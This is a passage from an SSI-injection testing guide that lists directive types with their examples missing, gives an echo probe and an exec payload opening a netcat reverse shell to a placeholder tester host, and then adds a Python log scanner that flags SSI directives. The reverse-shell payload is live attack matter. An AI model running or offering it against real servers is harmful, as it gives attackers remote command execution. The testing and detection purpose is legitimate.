- Date:
- Modification date of a file:
- CGI Program results:
- Including a footer:
- Executing commands:
- Setting variables:
- Including virtual files (same directory):
- Including files (same directory):
- Print all variables:
- Use the SSI directives as payload. If the expected values are returned, the application is vulnerable.
<!--#echo var="DATE_LOCAL" -->
- Confirm the vulnerability with the following payload:
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
- mkfifo /tmp/foo: Create FIFO special file.
- nc <IP> <PORT> 0</tmp/foo: Connect to the pentester machine, redirect standard input.
- | /bin/bash 1>/tmp/foo: Execute /bin/bash, redirect standard output to /tmp/foo.
- rm /tmp/foo: Cleanup FIFO file.
- Set up the Netcat listener on the attacking machine and there should be a connection.
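
From the defender's side, the probes above leave SSI directives in request data. The following is an added example, not part of the original page: it URL-decodes access-log lines (including double encoding) and flags known SSI directives. The severity ranking, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Opening of an SSI directive, e.g. <!--#echo ... (whitespace tolerated).
SSI_OPEN = re.compile(r"<!--\s*#\s*([a-z]+)\b", re.IGNORECASE)

# Severity ranking is this example's own choice, not a standard.
SEVERITY = {
    "exec": "critical",   # runs a command or CGI program
    "include": "high",    # pulls another file or URL into the page
    "set": "medium",
    "printenv": "medium",
    "echo": "low",        # typical first probe (DATE_LOCAL)
    "flastmod": "low",
    "fsize": "low",
    "config": "low",
}

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded directives are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi(value):
    """Return (directive, severity) for each known SSI directive in value."""
    names = (m.group(1).lower() for m in SSI_OPEN.finditer(decode(value)))
    return [(n, SEVERITY[n]) for n in names if n in SEVERITY]

def scan_log(lines):
    """Return (line_number, directive, severity) for every hit in the log."""
    return [(i, name, sev)
            for i, line in enumerate(lines, 1)
            for name, sev in find_ssi(line)]

# Constructed access-log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=%3C!--%23echo+var%3D%22DATE_LOCAL%22+--%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=%253C!--%2523exec%2520cmd%253D%2522CMD%2522--%253E HTTP/1.1" 200 498',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /docs?q=%3C!--+note+--%3E HTTP/1.1" 200 730',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same `find_ssi` check can be applied to request parameters before they are written into any page the server parses for SSI.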